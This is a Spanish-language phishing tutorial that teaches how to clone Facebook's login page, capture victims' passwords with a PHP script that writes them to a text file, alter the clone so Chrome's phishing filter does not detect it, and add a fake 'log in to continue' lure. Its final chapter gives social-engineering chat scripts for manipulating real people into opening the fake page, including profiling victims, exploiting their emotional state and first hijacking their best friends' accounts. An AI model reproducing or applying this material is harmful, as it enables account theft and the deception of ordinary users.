CONTENIDO:

-Introducción………………………………………………...2

-Como hacer un fake de facebook……………………….3

-Indetectando un fake a chrome………………………….13

-Ponerle “inicia sesión para continuar” para que

Se vea más creíble…………….........................................22

-Ingeniería Social para usar los fakes …………………..27

Bueno sean bienvenidos a este primer pdf de ingeniería

social impartido por mi “elshotta”.

Bueno como ya saben para hacer ingeniería social

seria bueno saber algo de html, css, javascript, php,

Pero no es 100% necesario.

De todas formas para entender más y hacer sus fakes

mejor es bueno saber esos lenguajes, pero yo aca les

mostrare como Yo Empeze en este mundo sin saber de

ningúno de esos lenguajes.

Bueno empezemos ya sin nada más que decir :)

Bueno esto es un tema muy buscado en la red, todos

tuvimos que pasar por eso de andar buscando en

youtube, google, y al fin dando con los foros podemos

encontrar una mejor solución.

En el foro hay muchísimos post sobre esto de crear un

fake de facebook, Outlook, lo que sea.

Pero veo que a los user no les queda muy claro o se

estancan en alguna parte y no hacen nada, terminan

buscando fakes online.

Entonces en esta guía tratare de enseñarles a hacer un

fake de facebook de la manera que entiendan más fácil.

Vamos a la página de facebook a la que haremos el

fake. Yo para mi gusto prefiero esta para los fakes de

facebook más que la de inicio.

https://www.facebook.com/login.php?next=https%3A%2F%2Fw

ww.facebook.com%2Fmessages

Entonces le damos a click derecho -> ver código fuente

de la página

Entonces veremos esta página copiamos todo y

guardamos en nuestro editor de texto

(Bloc de notas, dreamweaver, etc.)

Yo usare mi bloc de notas++, y lo guardan con el

clásico nombre index.html.

Lo abrimos para ver que todo esté en orden para seguir

haciendo el fake.

Ok esta todo en orden ;), ahora vamos a darle a buscar

(en bloc de notas de Windows es ctrl+b, en bloc de

notas ++ es ctrl+f y en dreamweaver creo que es igual).

Y buscamos la palabra “method” sin comillas y

aparecerá esto

Y vemos que antes del method ahí un link

/login.php?login_attempt=1&next=https%3A%2F%2Fw

ww.facebook.com%2Fmessages

Lo borramos y ponemos login.php

Listo ya tenemos la mitad del fake ahora lo que yo hacia

cuando era muy novato para crear el login.php era buscar

por google o en un foro.

Como este que he puesto en Masters-Hackers y Most-

Security, pero como el curso viene siendo de M-H entonces

pondré una captura del post en M-H

Link: http://masters-hackers.info/showthread.php?t=27487

Entonces dice que debemos buscar el id y el name del

login y del pass, la forma más fácil es con el firefox

seleccionar la parte donde se ponen los datos como en el

siguiente pantallazo.

Luego darle clic derecho -> ver código fuente seleccionado

Y aparecerá esto.

Ok entonces seria asi el php robadatos.

------------------------------------------------------------------------------

<?php

$id-email=$_POST["name-email"];

$id-pass=$_POST["name-pass"];

$guardar=fopen("pass.txt",a);

fwrite($guardar,"

".$id-email."

".$id-pass);

fclose($guardar);

echo "<META HTTP-EQUIV='refresh' CONTENT='1;

url=http://www.facebook.com'>";

?>

-------------------------------------------------------------------------------

Ahora quiero que se imaginen como va quedando el fake

Me explico con esta imagen

Entonces vemos que en el campo de correo electrónico el

id y el name es “email”.

y ahora buscamos el del password

El id y el name son “pass”

Bien entonces crearemos nuestro login.php

Con el editor de texto

<?php

$email=$_POST["email"];

$pass=$_POST["pass"];

$guardar=fopen("pass.txt",a);

fwrite($guardar,"

".$email."

".$pass);

fclose($guardar);

echo "<META HTTP-EQUIV='refresh' CONTENT='1;

url=http://www.facebook.com'>";

?>

Bueno ahora solo falta subirlo al hosting

Eso si no lo explicare por acá porque se va a alargar

mucho el curso, busquen en el foro que hay tengo un tuto

sobre eso :p .

Host recomendados:

www.hostyd.com

www.hostimite.com

www.hostinger.com

Ahora nos encontramos con un Nuevo enemigo

Que es filtro de chrome con su alerta de phising

Pero tranquilos en el otro capítulo enseñare a saltar este

molesto filtro

En este capítulo enseñare a indetectar cualquier fake a

chrome en este caso seguiremos con el de facebook.

Bueno seguimos…

Lo que vamos a hacer es abrir el fake de facebook con el

editor de texto y vamos al final del documento y

empezaremos a borrar todo lo que no tenga que ver con el

fake

Borramos los script que no sirven para nada en nuestro

fake Y mientras vamos borrando, vamos actualizando el

fake (para evitar que los errores se impriman en la

pantalla).

Entonces borramos todos los <script></script>

Y ahora borraremos todos los href=”” />

Esto llevara un poco de tiempo :p ajajajaj

Ya cuando hayamos borrado todos los href=”” y los <script>

Del código fuente llegamos a el top del fake (inicio)

Entonces lo que hacemos acá es guardar los css y el icono

en nuestra PC, vamos al primer css

https://fbstatica.akamaihd.net/rsrc.php/v2/y3/r/X5oSa59Mm

zA.css

y damos clic derecho-> guardar como y lo guardamos junto

al index.html

Dejen el mismo nombre, así

Actualicen el index.html y vemos que desaparece el

Facebook blanco que aparece en la esquina izquierda

WTF, Es bueno que actualicen la pagina del fake de vez en

cuando para detectar estos errores mas rápido.

Ahora vamos a abrir el css ‘X5oSa59MmzA.css’

y pondremos en el navegador los url que terminen en png o

sea una imagen

Agregando al comienzo la pagina de facebook

https://fbstatic-a.akamaihd.net

Entonces quedaria así

Bueno van probando los url hasta llegar a la imagen del

fake que falta

https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/r/BE57I-

Gef_l.png

y guardamos la imagen en el mismo lugar donde este

el index.html y los css.

Y borramos toda la ruta de la imagen excepto el nombre de

espero me explique bien :p

Ahi señalo en rojo lo que tienen que borrar.

Cuando terminen de borrar guardan y actualizan la pagina

y vemos que la imagen de facebook que aparece en la

esquina a vuelto a reaparecer ;)

Bueno, guardamos todos los css (actualizando la pagina

para detectar errores)

Y nos debe de quedar así

Guarden el icono https://fbstatic-

a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico

Pero cambien de nombre mejor

Entonces para los perdidos van a la pagina y dan en

guardar imagen (dándole clic en la imagen)

Y guardan luego borran la ruta en el index.html dejando

solo el nombre del icono,

Ahora borren esto

Le cambiamos el nombre a donde dice facebook

Y actualizamos la pagina

Veremos esto

Y ahora vamos al primer css que tiene el nombre de

UZlg6QD4e_0.css

y buscamos donde diga facebook

Y ponemos el mismo nombre que pusimos en el html, en mi

caso fue lol ustedes pongan cualquiera

Bueno ahora indetectaremos los css, como? Pues borrando

cosas que no tengan que ver con el fake sin afectarlo :p

Aunque para esto es recomendable saber sobre css así se

ahorraran mucho tiempo, entonces para hacerlo más rápido

vamos a borrar líneas de código css.

Y como ya he dicho antes ACTUALIZEN LA PAGINA

CADA VEZ QUE HAGAN CAMBIOS

Entonces empezaremos borrando la primera línea a ver

si No Al fake en el aspecto

Lo borramos y notamos que no cambio en el aspecto de la

página actualizándola

Borramos la siguiente línea

Que sería todo esto

Y actualizamos la pagina y vemos que si ocurre un cambio

El grosor de las letras donde dice “correo electrónico:”

Y “contraseña” a cambiado, denle crtl + z para que “regrese

la línea del código que No Debimos borrar”

Bueno entonces se tornaría muy largo si me pongo a

mostrar todo lo que pueden o no borrar, así que eso si se

los dejo a ustedes.

Esta es la parte que mas lleva tiempo porque tienen que

hacerlo línea por línea, pero estará indetectable al filtro de

chrome, como yo tengo mis fakes montados hace mucho

tiempo sin ser detectados por el filtro :D

Bueno sigamos con el próximo capítulo.

Bueno esto es facil a comparacion de todo lo que hemos

visto anteriormente :D asi que prosigamos :p

Bueno ya habia puesto esto en el foro, pero pues va otra

vez jaajajajajaj.

Vamos a facebook y vemos cualquier imagen graciosa de

esas que aparecen en las paginas donde publican memes

Ok ahora vamos a abrir otra pestaña con la pagina de

facebook http://www.facebook.com

Ahora cerramos en la pagina de facebook (la que no es la

de la foto del meme! )

Y entonces vamos a la pagina donde esta la foto y

esperamos a que salga el clasico “inicia secion para

continuar”

Y guardamos la pagina con cualquier nombre

Abrimos con el editor de texto

Buscamos el nombre del perfil que tenemos (aca es donde

la mayoria de users se confunden)

ahora vamos al final del documento y buscamos la parte que empieze con <div

class="uiContextualDialogPositioner uiLayer hidden_elem

uiContextualDialogLeft"

Y buscamos la parte del boton para ponerle la redireccion

al fake

y agregamos el evento onclick="location.href = 'Archivo a re

direccionar'

http://www.masters-hackers.info/showthread.php?t=38779

ahí tienen el post en M-H para que entiendan mejor

Ahora vamos al capítulo final y el más interesante que es el

de Trucos de ingeniería social para usar por chat

Bueno acá hemos llegado al tema más interesante de esta

rama del hacking que es el de la Ingeniería Social, ya

tenemos todos los materiales necesarios que son

*fake de facebook

*inicia sesión para continuar para que se vea mas creíble

*fake indetectable

Pero hace falta lo más importante que es el ¿Cómo

usarlos? Algunos de ustedes dirán

-eso es lo más fácil solo es enviarlo y ya está, tienen el

password de la víctima.

Pero pueden que tengan razón pero no todas las victimas

que van a tener son igual de ignorantes unas son mas

listas que otras y no todas caerán con los mismos trucos.

Bueno entonces la ingeniería social tiene algo de

psicología.

Bueno como nos enseñaron algúna vez en la escuela

la psicología es la ciencia que estudia al alma y del alma

viene la personalidad, el consciente y el inconsciente

no estoy pidiendo que estudien psicología para hacer

ingeniería social, pero es bueno saber cómo se comportan

las personas en estas épocas :P

Entonces para “hackear un facebook” se tiene que tomar

los siguientes pasos

1) Reconocimiento de cómo es tu victima

2) Mirando quien es de sus mejores amigos

3) Al momento de empezarle a hablar y ganar confianza

mirar en qué estado de ánimo se encuentra (tristeza,

furia, felicidad, etc.)

Bueno hagámonos la idea de que nos mandaron a hackear

este perfil de esta nena

Entonces vemos el paso uno que es Reconocimiento

Vemos que su perro murió hace un mes eso puede

decirnos que se encuentra deprimida lo que significa que

conocer a algún extraño (nosotros) no es lo que más quiere

hacer, tal vez hasta terminaría rechazándonos y

desconectándonos el chat y eso no nos serviría mucho :p

Es hincha de millonarios así que cuando empecemos a

ganar confianza decir algo como “de que equipo eres

hincha?”

Y ella dirá “obvio de millos” y tú dices “yo también nos

llevaremos muy bien (así no seas de millonarios ajajajaj)

Bueno muchas cosas que pueden sacar para recolectar

información, como ver que parece alguien social y

simpática eso nos hará las cosas más fácil :)

Bueno iremos al segundo punto Mirar sus mejores

amigos

Vemos las personas que etiqueta en sus fotos son

personas de confianza o buenos amigos

Obvio tu no etiquetarías en una foto a alguien que te caiga

mal.

Entonces se preguntan “para que esto? Para que quiero

ver a sus amigos, si lo que me interesa es su pass?”

Pues muy fácil, digamos que agregas a la victima pero

cuando vas a hablar con ella, vez que se nota muy distante

y no te habla o te evita, lo mejor que podrías hacer es

agregar a uno de sus mejores amigos, los que comenten

siempre sus estados en facebook o que siempre etiquete

en sus fotos, y robarles el pass a su mejor amigo y luego

robar el pass de la victima original ya que no desconfiaría

de que su mejor amigo quiera hacerle algo Tan malo que

es robarle la pass de su cuenta jaajajajaj.

Bueno en el punto tres Mirar estado de ánimo de la

victima

Pondré algunos ejemplos escritos porque no tengo

agregada a la victima ajajja

Ok para mi gusto prefiero usar perfiles falsos o hacked para

hacer mis ataques de ingeniería social.

de un Hombre y otro de una Mujer, ambos jóvenes porque

siempre que me buscan para hackear facebook son

jóvenes entre 16 a 25 años.

Entonces tenia que “hackear a un hombre” entonces use el

perfil de la mujer, lo agregue cuando me acepto, espere a

que estuviera conectado y empecé con la conversación

marcare lo que yo digo con y lo que dice la víctima con

rojo

-Hola -hola -como estas? -Venga quien es usted la conozco o me distingue o que es lo que quiere Que podemos observar aquí? “bueno vemos que la victima esta con mal humor o siempre se porta así con los desconocidos entonces ganar su confianza se nos dificultara mas” Otro ejemplo muy molesto es este

-Hola -Hola -como estas? -bien y tu? -bien bien, oye me regalas un like a esta foto (link del fake ) -ok ;) - (dos minutos después) oye ya le diste like, no me llego nada :’( -like a qué? - a la foto que te mande (enviamos de nuevo el fake) -no me abre nada -mmmm de verdad pero ya varios amigos me han dado like -mmm no se Esto en realidad es muy molesto que la víctima no se sabe en que mundo esta o tal vez se dio cuenta de que la están intentando hackear (pero normalmente te mandan a la mierda jajajajajaaj), o tal vez tiene miedo de abrir el link porque piensa que es algún virus o no se sabe, pero no abre el link porque eres un desconocido que le está enviando un link. Bueno estos son los más vistos :p (de los que no caen).

Existen tres métodos para hacer ingeniería social que he descubierto con el tiempo y se los explicare :D

Método Seco: Este método es uno de los métodos más usados para hacer ingeniería social por chat, pero no es el más recomendable, ejemplo. ------------------------------------------------------------------------------ -Hola -Hola -oye regálame un like a esta foto (enviamos fake) -ok -ya le di like ;) -gracias ------------------------------------------------------------------------------- O también esta de esta forma

-Hola

- -oye esta eres tu o alguien creo un perfil y pone tus fotos (link del fake, esto es para llamar su atención) -si esa foto es mia ------------------------------------------------------------------------------- Entonces vemos que el método seco se trata de enviarle el fake sin tener confianza ni nada, este método funciona 45% de las veces.

Método de esperar a que haya confianza total: Este método es el más demorado pero es el más efectivo de todos, porque tienes que hablar demasiado con la víctima y ganar su confianza como harías con una amiga o amigo de verdad, la confianza se gana después de dos días pero si lo que no tienes es tiempo para todo eso acá viene el otro método.

Método de confundir a la víctima: Este método es el que más uso yo, se trata de cómo dice “confundir a la víctima” vean el ejemplo -Hola -Hola -Como estas? -bien y tu? -Bien Bien -oye cuando nos vamos a volver a ver -te conozco??? -ushh no te acuerdas de mi? -no o.O -no te acuerdas que estábamos en el parque que dia con tus amigos y que yo llege ahí y empezamos a hablar? - o.O no no me acuerdo, -dime cual parque? Quienes estaban? (aca ya debimos haber recolectado información de lugar donde vive la víctima y sus amigos) -en el parque que queda atrás del éxito -mmmm no me acuerdo la verdad, dime cual amigo -mira fue este, el me dio tu facebook (enviamos fake) -no me aparece nada (ponemos que el fake re direccione a una página de facebook que dice “no se pudo encontrar la pagina”) -mmmm tal vez es porque el me dijo que iba a desactivar la cuenta porque tuvo problemas con la novia

-mmmm ok -pero yo te lo envió cuando la active de nuevo -ok (Miramos las contraseñas capturadas y ahí debe de estar su pass :D) Bueno ya hasta acá termina el pdf del curso de ingeniería social impartido por mi Elshotta

Fin